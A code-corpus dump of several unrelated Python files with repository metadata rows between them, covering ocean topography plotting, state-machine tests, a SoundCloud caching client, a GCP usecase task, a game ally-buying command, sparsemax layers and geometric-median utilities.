WECR_DATASET_COLUMNS_TYPE_MAP = {
WECR_COLUMN_CLOTHING_ID: "Int64",
WECR_COLUMN_AGE: "Int64",
WECR_COLUMN_TITLE: str,
WECR_COLUMN_REVIEW_TEXT: str,
WECR_COLUMN_RATING: "Int64",
WECR_COLUMN_RECOMMENDED_IND: "Int64",
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT: "Int64",
WECR_COLUMN_DIVISION_NAME: str,
WECR_COLUMN_DEPARTMENT_NAME: str,
WECR_COLUMN_CLASS_NAME: str,
}
WECR_DATASET_COLUMNS = WECR_DATASET_COLUMNS_TYPE_MAP.keys()
WECR_DATASET_NULLABLE_COLUMNS = [
WECR_COLUMN_AGE,
WECR_COLUMN_TITLE,
WECR_COLUMN_REVIEW_TEXT,
WECR_COLUMN_RATING,
WECR_COLUMN_RECOMMENDED_IND,
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT,
WECR_COLUMN_DIVISION_NAME,
WECR_COLUMN_DEPARTMENT_NAME,
WECR_COLUMN_CLASS_NAME,
]
def MACRO_GET_DATASET_DIR(table):
return f"{DATA_DIR}/{table}{DATA_FILE_EXTENSION}"
def MACRO_GET_REQUIRED_COLUMNS(dataframe, nullable_columns):
nullable_cols = [col for col in dataframe.columns if col not in nullable_columns]
return nullable_cols if len(nullable_cols) > 0 else None
| 33.319635 | 93 | 0.771139 | 947 | 7,297 | 5.346357 | 0.145723 | 0.142208 | 0.071104 | 0.028442 | 0.48094 | 0.259332 | 0.122062 | 0.065574 | 0.065574 | 0.065574 | 0 | 0.005047 | 0.131013 | 7,297 | 218 | 94 | 33.472477 | 0.793408 | 0.008086 | 0 | 0.0625 | 0 | 0 | 0.222268 | 0.097372 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010417 | false | 0 | 0 | 0.005208 | 0.020833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e72ac9ee875861cb5ac036cb18ed4ef985d32680 | 3,262 | py | Python | SouthernOceanTopography3D.py | cesar-rocha/SouthernOceanTopography | 10e698e01e8435ae35ef028437d7a881fa3e5585 | [
"MIT"
] | null | null | null | SouthernOceanTopography3D.py | cesar-rocha/SouthernOceanTopography | 10e698e01e8435ae35ef028437d7a881fa3e5585 | [
"MIT"
] | null | null | null | SouthernOceanTopography3D.py | cesar-rocha/SouthernOceanTopography | 10e698e01e8435ae35ef028437d7a881fa3e5585 | [
"MIT"
] | 1 | 2020-12-11T02:15:56.000Z | 2020-12-11T02:15:56.000Z |
# coding: utf-8
# This script makes a 3D plot of the Southern Ocean topography.
#
# The data comes from some geophysiscists at Columbia. The product is "MGDS: Global Multi-Resolution Topography". These folks took all multibeam swath data that they can get their hands on and filled gaps with Smith and Sandwell. See http://www.marine-geo.org/portals/gmrt/ for data covarage.
import numpy as np
import matplotlib.pyplot as plt
# get_ipython().magic('matplotlib inline')
from netCDF4 import Dataset
from mpl_toolkits.basemap import Basemap
import scipy as sp
import scipy.interpolate
import scipy.io as io
import seawater as sw
from pyspec import spectrum as spec
import cmocean
from mpl_toolkits.mplot3d import Axes3D
plt.close("all")
## select different regions
def subregion_plot(latmin=-64,lonmin=-100,dlat=8,dlon=15):
latmax = latmin+dlat
lonmax = lonmin+dlon
lon = np.array([lonmin,lonmax,lonmax,lonmin,lonmin])
lat = np.array([latmin,latmin,latmax,latmax,latmin])
x,y = m(lon,lat)
return x,y
def extract_topo(lon,lat,latmin=-64,lonmin=-100,dlat=8,dlon=15):
latmax = latmin+dlat
lonmax = lonmin+dlon
flat = (lat>=latmin)&(lat<=latmax)
flon = (lon>=lonmin)&(lon<=lonmax)
lont = lon[flon]
latt = lat[flat]
topo = z[flat,:]
topo = topo[:,flon]
return lont,latt,topo
topo = Dataset('GMRTv3_1_20160124topo.grd')
pf = Dataset('SO_polar_fronts.v3.nc')
lonpf, latpf,latsaf,latsafn = pf['lon'][:], pf['latPF'][:],pf['latSAF'][:], pf['latSAFN'][:]
time = pf['is_aviso_nrt'][:]
latpf = latpf.reshape(time.size,lonpf.size)
latpf = np.nanmean(latpf,axis=0).squeeze()
latsaf = latsaf.reshape(time.size,lonpf.size)
latsaf = np.nanmean(latsaf,axis=0).squeeze()
latsafn = latsafn.reshape(time.size,lonpf.size)
latsafn = np.nanmean(latsafn,axis=0).squeeze()
x = topo['lon'][:]
y = topo['lat'][:]
#z = (topo['z'][:]).reshape(y.size,x.size)
z = topo['altitude'][:]
# get a subset
latmin, latmax = -80., -20
lonmin, lonmax = -180., 180.
flat = (y>=latmin)&(y<=latmax)
flon = (x>=lonmin)&(x<=lonmax)
lat = y[flat]
lon = x[flon]
z = z[flat,:]
z = z[:,flon]
z = np.ma.masked_array(z,z>=0)
x,y = np.meshgrid(lon,lat)
lon,lat = np.meshgrid(lon,lat)
z[z>=0]=0.
fig = plt.figure(figsize=(22,8))
ax = fig.add_subplot(111, projection='3d')
# this controls the quality of the plot
# set to =1 for maximum quality
dec = 10
#ax.contourf(lon[::dec,::dec],lat[::dec,::dec],z[::dec,::dec], [-2000, -1000], cmap=cmocean.cm.bathy_r)
surf = ax.plot_surface(lon[::dec,::dec],lat[::dec,::dec],z[::dec,::dec],
linewidth=0, rstride=1, cstride=1, alpha=1, cmap='YlGnBu',
vmin=-5500,vmax=-500)
ax.contourf(lon[::dec,::dec],lat[::dec,::dec],z[::dec,::dec],[-1.,0],colors='peru')
ax.set_zticks([])
ax.view_init(75, 290)
#ax.plot(xpf,ypf,'w.')
#ax.plot(xsaf,ysaf,'w.')
lonpf[lonpf>180] = lonpf[lonpf>180]-360
ax.plot(lonpf,latpf,-2000,'w.')
ax.plot(lonpf,latsaf,-2000,'w.')
ax.plot(lonpf,latsafn,-2000,'w.')
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.745, 0.2, 0.02, 0.4])
fig.colorbar(surf, cax=cbar_ax,label=r'',extend='both')
#plt.savefig('SO3DTopo.pdf',bbox_inches='tight')
plt.savefig('SO3DTopo.png',bbox_inches='tight',dpi=300)
#plt.show()
| 23.467626 | 292 | 0.671061 | 532 | 3,262 | 4.071429 | 0.402256 | 0.024931 | 0.020776 | 0.027701 | 0.147276 | 0.099261 | 0.099261 | 0.099261 | 0.099261 | 0.087719 | 0 | 0.043741 | 0.137952 | 3,262 | 138 | 293 | 23.637681 | 0.726529 | 0.232066 | 0 | 0.056338 | 0 | 0 | 0.054282 | 0.018496 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028169 | false | 0 | 0.15493 | 0 | 0.211268 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e72e5ca0d5f1fd1ab089d27e8486d4e08350c674 | 2,136 | py | Python | tests/performance_test.py | CMU-TBD/behavior_machine | b403192b8002603fc20c76713c7a9fe46a7ed686 | [
"MIT"
] | 1 | 2020-07-28T20:17:52.000Z | 2020-07-28T20:17:52.000Z | tests/performance_test.py | CMU-TBD/behavior_machine | b403192b8002603fc20c76713c7a9fe46a7ed686 | [
"MIT"
] | 1 | 2021-01-25T15:54:45.000Z | 2021-01-25T15:54:45.000Z | tests/performance_test.py | CMU-TBD/behavior_machine | b403192b8002603fc20c76713c7a9fe46a7ed686 | [
"MIT"
] | 1 | 2021-01-22T06:12:10.000Z | 2021-01-22T06:12:10.000Z | from behavior_machine.library.parallel_state import ParallelState
import time
from behavior_machine.core import Board, StateStatus, State, Machine, machine
from behavior_machine.library import IdleState
def test_repeat_node_in_machine_fast():
counter = 0
class CounterState(State):
def execute(self, board: Board) -> StateStatus:
nonlocal counter
counter += 1
return StateStatus.SUCCESS
ds1 = CounterState("ds1")
ds2 = CounterState("ds2")
ds3 = CounterState("ds3")
ds1.add_transition_on_success(ds2)
ds2.add_transition_on_success(ds3)
ds3.add_transition_on_success(ds1)
exe = Machine('exe', ds1, rate=60)
exe.start(None)
time.sleep(2)
exe.interrupt()
# the performance of the computer might change this.
assert counter >= (60 * 2) - 2
assert counter <= (60 * 2) + 1
def test_validate_transition_immediate():
counter = 0
class CounterState(State):
def execute(self, board: Board) -> StateStatus:
nonlocal counter
counter += 1
return StateStatus.SUCCESS
ds1 = CounterState("ds1")
ds2 = CounterState("ds2")
ds3 = CounterState("ds3")
ds1.add_transition(lambda s, b: True, ds2)
ds2.add_transition(lambda s, b: True, ds3)
ds3.add_transition(lambda s, b: True, ds1)
exe = Machine('exe', ds1, rate=60)
exe.start(None)
time.sleep(2)
exe.interrupt()
# the performance of the computer might change this.
assert counter >= (60 * 2) - 2
assert counter <= (60 * 2) + 1
def test_multiple_parallel_states():
class CompleteState(State):
def execute(self, board: Board) -> StateStatus:
return StateStatus.SUCCESS
num_parallel = 500
child_states = []
for i in range(0, num_parallel):
child_states.append(CompleteState(f"I{i}"))
pp = ParallelState("parallel", child_states)
exe = Machine('exe', pp, end_state_ids=['parallel'], rate=100)
start_time = time.time()
exe.start(None)
exe.wait()
elapsed_time = time.time() - start_time
assert elapsed_time < (1/10)
| 27.384615 | 77 | 0.654963 | 269 | 2,136 | 5.05948 | 0.27881 | 0.057311 | 0.044085 | 0.047024 | 0.551065 | 0.551065 | 0.505511 | 0.476121 | 0.476121 | 0.476121 | 0 | 0.038037 | 0.236891 | 2,136 | 77 | 78 | 27.74026 | 0.796933 | 0.047285 | 0 | 0.578947 | 0 | 0 | 0.023141 | 0 | 0 | 0 | 0 | 0 | 0.087719 | 1 | 0.105263 | false | 0 | 0.070175 | 0.017544 | 0.280702 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e72ec4ac47db8b60c5ca290dce90179f2358006a | 3,580 | py | Python | scdown/sc.py | chrisjr/scdown | fe82dce52884661297ecf640cd3ffd18c76ffc25 | [
"MIT"
] | null | null | null | scdown/sc.py | chrisjr/scdown | fe82dce52884661297ecf640cd3ffd18c76ffc25 | [
"MIT"
] | null | null | null | scdown/sc.py | chrisjr/scdown | fe82dce52884661297ecf640cd3ffd18c76ffc25 | [
"MIT"
] | null | null | null | import soundcloud
import os
import logging
from datetime import datetime
import requests
import sys
from celeryconfig import mongolab
import pymongo
from pymongo import MongoClient
from pymongo.errors import OperationFailure
USER = '/users/{_id}'
USER_TRACKS = '/users/{_id}/tracks'
USER_FOLLOWINGS = '/users/{_id}/followings'
USER_FOLLOWERS = '/users/{_id}/followers'
USER_WEB_PROFILES = '/users/{_id}/web-profiles'
TRACK = '/tracks/{_id}'
TRACK_COMMENTS = '/tracks/{_id}/comments'
TRACK_FAVORITERS = '/tracks/{_id}/favoriters'
TRACK_DOWNLOAD = '/tracks/{_id}/download'
TRACK_STREAM = '/tracks/{_id}/stream'
class RequestDB(object):
client = None
db = None
coll = None
logger = None
def __init__(self, db_name="soundcloud", logger=logging.getLogger("")):
self.logger = logger
self.client = MongoClient(mongolab)
self.db = self.client[db_name]
self.coll = self.db.requests
try:
self.coll.ensure_index([("key", pymongo.ASCENDING),
("unique", True)])
except OperationFailure as e:
logger.error("Could not create index.")
logger.error(e)
def get(self, key):
v = self.coll.find_one({"key": key})
if v is not None:
return v["value"]
else:
return None
def set(self, key, value):
now = datetime.utcnow()
doc = {"key": key, "value": value, "retrieved": now}
self.coll.update({"key": key}, doc, upsert=True)
self.logger.info("Stored {} in db".format(key))
def close(self):
if self.db is not None:
self.db.close()
class Sc(object):
_sc_client = None
_db = None
_logger = None
def __init__(self, sc_client=None, db_name="soundcloud",
logger=logging.getLogger("")):
self._logger = logger
if sc_client is None:
sc_client_id = os.getenv('SOUNDCLOUD_CLIENT_ID')
if sc_client_id is None:
err = "SOUNDCLOUD_CLIENT_ID was not set!"
self._logger.error(err)
sys.exit(err)
sc_client = soundcloud.Client(client_id=sc_client_id)
self._sc_client = sc_client
self._db = RequestDB(db_name, logger)
def get_sc(self, template, _id=None):
key = template.format(_id=_id) if _id is not None else template
self._logger.info("GET {}".format(key))
value = self._db.get(key)
if value is not None:
return value
else:
if _id is None:
res = self._sc_client.get(key, allow_redirects=False)
track_url = res.location
return requests.get(track_url, stream=True)
else:
res = self._sc_client.get(key)
if hasattr(res, "data"):
res1 = [dict(o.fields()) for o in res]
self._db.set(key, res1)
return res1
elif hasattr(res, "fields"):
res1 = dict(res.fields())
self._logger.info(repr(res1))
self._db.set(key, res1)
return res1
else:
return res
def __del__(self):
if self._db is not None:
self._db.close()
def prefill_user(user_id):
"""Cache the basic info on a user"""
sc = Sc(db_name="soundcloud")
for t in [USER, USER_WEB_PROFILES,
USER_FOLLOWINGS, USER_TRACKS, USER_FOLLOWERS]:
sc.get_sc(t, user_id)
| 30.862069 | 75 | 0.572626 | 440 | 3,580 | 4.452273 | 0.236364 | 0.033691 | 0.022971 | 0.016335 | 0.161307 | 0.161307 | 0.114344 | 0.0878 | 0.0878 | 0.03267 | 0 | 0.002854 | 0.314804 | 3,580 | 115 | 76 | 31.130435 | 0.79576 | 0.00838 | 0 | 0.081633 | 0 | 0 | 0.106095 | 0.038939 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081633 | false | 0 | 0.102041 | 0 | 0.346939 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e730923173d6165ff991f322cce7b078b98b427d | 3,163 | py | Python | engine/api/gcp/tasks/system_add_new_usecase.py | torrotitans/torro_community | a3f153e69a860f0d6c831145f529d9e92193a0ae | [
"MIT"
] | 1 | 2022-01-12T08:31:59.000Z | 2022-01-12T08:31:59.000Z | engine/api/gcp/tasks/system_add_new_usecase.py | torrotitans/torro_community | a3f153e69a860f0d6c831145f529d9e92193a0ae | [
"MIT"
] | null | null | null | engine/api/gcp/tasks/system_add_new_usecase.py | torrotitans/torro_community | a3f153e69a860f0d6c831145f529d9e92193a0ae | [
"MIT"
] | 2 | 2022-01-19T06:26:32.000Z | 2022-01-26T15:25:15.000Z | from api.gcp.tasks.baseTask import baseTask
from db.usecase.db_usecase_mgr import usecase_mgr
from googleapiclient.errors import HttpError
from utils.status_code import response_code
import traceback
import json
import logging
logger = logging.getLogger("main.api.gcp.tasks" + __name__)
class system_add_new_usecase(baseTask):
api_type = 'system'
api_name = 'system_add_new_usecase'
arguments = {
'usecase_name': {"type": str, "default": ''},
"region_country": {"type": str, "default": ''},
'validity_date': {"type": str, "default": ''},
"uc_des": {"type": str, "default": ''},
'admin_sa': {"type": str, "default": ''},
"budget": {"type": int, "default": 0},
'allow_cross_region': {"type": str, "default": ''},
"resources_access": {"type": str, "default": ''},
"uc_team_group": {"type": str, "default": ''},
"uc_owner_group": {"type": str, "default": ''},
"uc_label": {"type": str, "default": ''},
}
def __init__(self, stage_dict):
super(system_add_new_usecase, self).__init__(stage_dict)
# print('stage_dict:', stage_dict)
def execute(self, workspace_id=None, form_id=None, input_form_id=None, user_id=None):
try:
missing_set = set()
for key in self.arguments:
check_key = self.stage_dict.get(key, 'NotFound')
if check_key == 'NotFound':
missing_set.add(key)
# # print('{}: {}'.format(key, self.stage_dict[key]))
if len(missing_set) != 0:
data = response_code.BAD_REQUEST
data['msg'] = 'Missing parameters: {}'.format(', '.join(missing_set))
return data
else:
# print('self.stage_dict:', self.stage_dict)
usecase_info = self.stage_dict
usecase_info['workspace_id'] = workspace_id
usecase_info['uc_input_form'] = input_form_id
usecase_info['user_id'] = user_id
# usecase_info = {'workspace_id': workspace_id}
# uc_owner_group = self.stage_dict['uc_owner_group']
# usecase_info['uc_owner_group'] = uc_owner_group
data = usecase_mgr.add_new_usecase_setting(usecase_info)
if data['code'] == 200:
usecase_id = data['data']['usecase_id']
data1 = usecase_mgr.update_usecase_resource(workspace_id, usecase_id, usecase_info['uc_owner_group'])
return data
else:
return data
except HttpError as e:
error_json = json.loads(e.content, strict=False)
data = error_json['error']
data["msg"] = data.pop("message")
logger.error("FN:system_add_new_usecase_execute error:{}".format(traceback.format_exc()))
return data
except Exception as e:
logger.error("FN:system_add_new_usecase_execute error:{}".format(traceback.format_exc()))
data = response_code.BAD_REQUEST
data['msg'] = str(e)
return data | 44.549296 | 121 | 0.5773 | 362 | 3,163 | 4.720994 | 0.28453 | 0.04096 | 0.081919 | 0.055588 | 0.229959 | 0.156817 | 0.118198 | 0.079579 | 0.079579 | 0.079579 | 0 | 0.002663 | 0.287702 | 3,163 | 71 | 122 | 44.549296 | 0.755881 | 0.085678 | 0 | 0.183333 | 0 | 0 | 0.174697 | 0.030503 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.116667 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e731796d279cf969e12aff158cf9fea92faa20ea | 1,394 | py | Python | allies/management/commands/volley_ally.py | kevincornish/HeckGuide | eb974d6b589908f5fc2308d41032a48941cc3d21 | [
"MIT"
] | 4 | 2022-02-16T10:19:11.000Z | 2022-03-17T03:34:26.000Z | allies/management/commands/volley_ally.py | kevincornish/HeckGuide | eb974d6b589908f5fc2308d41032a48941cc3d21 | [
"MIT"
] | 1 | 2022-02-17T14:02:31.000Z | 2022-03-31T03:56:42.000Z | allies/management/commands/volley_ally.py | kevincornish/HeckGuide | eb974d6b589908f5fc2308d41032a48941cc3d21 | [
"MIT"
] | 3 | 2022-02-17T06:13:52.000Z | 2022-03-23T21:37:21.000Z | from django.core.management.base import BaseCommand, CommandError
from api import HeckfireApi, TokenException
from django.conf import settings
import logging
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = 'Volly an ally via supplied username'
def add_arguments(self, parser):
parser.add_argument('username', type=str)
def handle(self, *args, **options):
"""
This class find an ally through the supplied username, and
will cycle through each token purchasing the ally on each account.
Usage: python manage.py volly_ally username "kevz"
"""
staytoken = settings.STAY_ALIVE_TOKEN
tokens = settings.TOKENS
username = options['username']
for token in tokens:
api = HeckfireApi(token=token, staytoken=staytoken)
ally = api.get_ally_by_name(username)
try:
user_id = ally['allies'][0]["user_id"]
cost = ally['allies'][0]["cost"]
try:
api.collect_loot()
api.buy_ally(user_id, cost)
api.stay_alive()
logger.info(f"Buying '{username}', ID: {user_id}, Cost: {cost}")
except TokenException as e:
logger.info(f"Exception: {e}")
except IndexError as e:
logger.info(f"User does not exist") | 38.722222 | 82 | 0.607604 | 163 | 1,394 | 5.079755 | 0.503067 | 0.028986 | 0.036232 | 0.031401 | 0.033816 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002041 | 0.296987 | 1,394 | 36 | 83 | 38.722222 | 0.842857 | 0.126973 | 0 | 0.071429 | 0 | 0 | 0.131579 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e73755fa550829d883f1573e3aa8b34fc04f814e | 7,030 | py | Python | src/tabnet/sparsemax.py | clemens33/thesis | c94e066c2fe22881a7465eb9c3859bd02138748e | [
"MIT"
] | null | null | null | src/tabnet/sparsemax.py | clemens33/thesis | c94e066c2fe22881a7465eb9c3859bd02138748e | [
"MIT"
] | null | null | null | src/tabnet/sparsemax.py | clemens33/thesis | c94e066c2fe22881a7465eb9c3859bd02138748e | [
"MIT"
] | null | null | null | from typing import Any, Tuple, Union
import torch
import torch.nn as nn
from entmax import entmax_bisect
class _Sparsemax1(torch.autograd.Function):
"""adapted from https://github.com/aced125/sparsemax/tree/master/sparsemax"""
@staticmethod
def forward(ctx: Any, input: torch.Tensor, dim: int = -1) -> torch.Tensor: # noqa
input_dim = input.dim()
if input_dim <= dim or dim < -input_dim:
raise IndexError(
f"Dimension out of range (expected to be in range of [-{input_dim}, {input_dim - 1}], but got {dim})"
)
# Save operating dimension to context
ctx.needs_reshaping = input_dim > 2
ctx.dim = dim
if ctx.needs_reshaping:
ctx, input = _Sparsemax1._flatten_all_but_nth_dim(ctx, input)
# Translate by max for numerical stability
input = input - input.max(-1, keepdim=True).values.expand_as(input)
zs = input.sort(-1, descending=True).values
range = torch.arange(1, input.size()[-1] + 1)
range = range.expand_as(input).to(input)
# Determine sparsity of projection
bound = 1 + range * zs
is_gt = bound.gt(zs.cumsum(-1)).type(input.dtype)
k = (is_gt * range).max(-1, keepdim=True).values
# Compute threshold
zs_sparse = is_gt * zs
# Compute taus
taus = (zs_sparse.sum(-1, keepdim=True) - 1) / k
taus = taus.expand_as(input)
output = torch.max(torch.zeros_like(input), input - taus)
# Save context
ctx.save_for_backward(output)
# Reshape back to original shape
if ctx.needs_reshaping:
ctx, output = _Sparsemax1._unflatten_all_but_nth_dim(ctx, output)
return output
@staticmethod
def backward(ctx: Any, grad_output: torch.Tensor) -> Tuple[torch.Tensor, None]: # noqa
output, *_ = ctx.saved_tensors
# Reshape if needed
if ctx.needs_reshaping:
ctx, grad_output = _Sparsemax1._flatten_all_but_nth_dim(ctx, grad_output)
# Compute gradient
nonzeros = torch.ne(output, 0)
num_nonzeros = nonzeros.sum(-1, keepdim=True)
sum = (grad_output * nonzeros).sum(-1, keepdim=True) / num_nonzeros
grad_input = nonzeros * (grad_output - sum.expand_as(grad_output))
# Reshape back to original shape
if ctx.needs_reshaping:
ctx, grad_input = _Sparsemax1._unflatten_all_but_nth_dim(ctx, grad_input)
return grad_input, None
@staticmethod
def _flatten_all_but_nth_dim(ctx: Any, x: torch.Tensor) -> Tuple[Any, torch.Tensor]:
"""
Flattens tensor in all but 1 chosen dimension.
Saves necessary context for backward pass and unflattening.
"""
# transpose batch and nth dim
x = x.transpose(0, ctx.dim)
# Get and save original size in context for backward pass
original_size = x.size()
ctx.original_size = original_size
# Flatten all dimensions except nth dim
x = x.reshape(x.size(0), -1)
# Transpose flattened dimensions to 0th dim, nth dim to last dim
return ctx, x.transpose(0, -1)
@staticmethod
def _unflatten_all_but_nth_dim(ctx: Any, x: torch.Tensor) -> Tuple[Any, torch.Tensor]:
"""
Unflattens tensor using necessary context
"""
# Tranpose flattened dim to last dim, nth dim to 0th dim
x = x.transpose(0, 1)
# Reshape to original size
x = x.reshape(ctx.original_size)
# Swap batch dim and nth dim
return ctx, x.transpose(0, ctx.dim)
class _Sparsemax2(torch.autograd.Function):
# credits to Yandex https://github.com/Qwicen/node/blob/master/lib/nn_utils.py
# TODO this version fails gradient checking - refer to tests - check why?
"""
An implementation of sparsemax (Martins & Astudillo, 2016). See
:cite:`DBLP:journals/corr/MartinsA16` for detailed description.
By Ben Peters and Vlad Niculae
"""
@staticmethod
def forward(ctx, input, dim=-1): # noqa
"""sparsemax: normalizing sparse transform (a la softmax)
Parameters
----------
ctx : torch.autograd.function._ContextMethodMixin
input : torch.Tensor
any shape
dim : int
dimension along which to apply sparsemax
Returns
-------
output : torch.Tensor
same shape as input
"""
ctx.dim = dim
max_val, _ = input.max(dim=dim, keepdim=True)
input -= max_val # same numerical stability trick as for softmax
tau, supp_size = _Sparsemax2._threshold_and_support(input, dim=dim)
output = torch.clamp(input - tau, min=0)
ctx.save_for_backward(supp_size, output)
return output
@staticmethod
def backward(ctx, grad_output): # noqa
supp_size, output = ctx.saved_tensors
dim = ctx.dim
grad_input = grad_output.clone()
grad_input[output == 0] = 0
v_hat = grad_input.sum(dim=dim) / supp_size.to(output.dtype).squeeze()
v_hat = v_hat.unsqueeze(dim)
grad_input = torch.where(output != 0, grad_input - v_hat, grad_input)
return grad_input, None
@staticmethod
def _threshold_and_support(input, dim=-1):
"""Sparsemax building block: compute the threshold
Parameters
----------
input: torch.Tensor
any dimension
dim : int
dimension along which to apply the sparsemax
Returns
-------
tau : torch.Tensor
the threshold value
support_size : torch.Tensor
"""
input_srt, _ = torch.sort(input, descending=True, dim=dim)
input_cumsum = input_srt.cumsum(dim) - 1
rhos = _Sparsemax2._make_ix_like(input, dim)
support = rhos * input_srt > input_cumsum
support_size = support.sum(dim=dim).unsqueeze(dim)
tau = input_cumsum.gather(dim, support_size - 1)
tau /= support_size.to(input.dtype)
return tau, support_size
@staticmethod
def _make_ix_like(input, dim=0):
d = input.size(dim)
rho = torch.arange(1, d + 1, device=input.device, dtype=input.dtype)
view = [1] * input.dim()
view[0] = -1
return rho.view(view).transpose(0, dim)
class Sparsemax(nn.Module):
def __init__(self, dim: int = -1):
super(Sparsemax, self).__init__()
self.dim = dim
self.sparsemax = _Sparsemax1.apply
def forward(self, input: torch.Tensor) -> torch.Tensor:
return self.sparsemax(input, self.dim)
class EntmaxBisect(nn.Module):
def __init__(self, alpha: Union[nn.Parameter, float] = 1.5, dim: int = -1, n_iter: int = 50):
super().__init__()
self.dim = dim
self.n_iter = n_iter
self.alpha = alpha
def forward(self, X):
return entmax_bisect(
X, alpha=self.alpha, dim=self.dim, n_iter=self.n_iter
)
| 32.100457 | 117 | 0.616074 | 905 | 7,030 | 4.61768 | 0.234254 | 0.039483 | 0.012922 | 0.017229 | 0.23642 | 0.160804 | 0.137832 | 0.069873 | 0.049294 | 0.049294 | 0 | 0.013069 | 0.28165 | 7,030 | 218 | 118 | 32.247706 | 0.814455 | 0.238265 | 0 | 0.183486 | 0 | 0.009174 | 0.019433 | 0 | 0 | 0 | 0 | 0.004587 | 0 | 1 | 0.110092 | false | 0 | 0.036697 | 0.018349 | 0.275229 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e737a6ff2ca452102fe4ae2d50a7bb2e06a1ab1b | 1,423 | py | Python | subseasonal_toolkit/models/deb_ecmwf/ecmwf_utils.py | UtopiaLLC/subseasonal_toolkit | 35e120a010606d10a7d94cdfbf4cb8347a234dfb | [
"MIT"
] | 2 | 2021-10-02T07:37:52.000Z | 2022-01-27T07:46:31.000Z | subseasonal_toolkit/models/deb_ecmwf/ecmwf_utils.py | UtopiaLLC/subseasonal_toolkit | 35e120a010606d10a7d94cdfbf4cb8347a234dfb | [
"MIT"
] | null | null | null | subseasonal_toolkit/models/deb_ecmwf/ecmwf_utils.py | UtopiaLLC/subseasonal_toolkit | 35e120a010606d10a7d94cdfbf4cb8347a234dfb | [
"MIT"
] | 3 | 2021-09-27T16:53:35.000Z | 2021-12-27T21:39:07.000Z | from scipy.spatial.distance import cdist, euclidean
def geometric_median(X, eps=1e-5):
"""Computes the geometric median of the columns of X, up to a tolerance epsilon.
The geometric median is the vector that minimizes the mean Euclidean norm to
each column of X.
"""
y = np.mean(X, 0)
while True:
D = cdist(X, [y])
nonzeros = (D != 0)[:, 0]
Dinv = 1 / D[nonzeros]
Dinvs = np.sum(Dinv)
W = Dinv / Dinvs
T = np.sum(W * X[nonzeros], 0)
num_zeros = len(X) - np.sum(nonzeros)
if num_zeros == 0:
y1 = T
elif num_zeros == len(X):
return y
else:
R = (T - y) * Dinvs
r = np.linalg.norm(R)
rinv = 0 if r == 0 else num_zeros/r
y1 = max(0, 1-rinv)*T + min(1, rinv)*y
if euclidean(y, y1) < eps:
return y1
y = y1
def ssm(X, alpha=1):
"""Computes stabilized sample mean (Orenstein, 2019) of each column of X
Args:
alpha: if infinity, recovers the mean; if 0 approximates median
"""
# Compute first, second, and third uncentered moments
mu = np.mean(X,0)
mu2 = np.mean(np.square(X),0)
mu3 = np.mean(np.power(X,3),0)
# Return mean - (third central moment)/(3*(2+numrows(X))*variance)
return mu - (mu3 - 3*mu*mu2+2*np.power(mu,3)).div(3*(2+alpha*X.shape[0])*(mu2 - np.square(mu)))
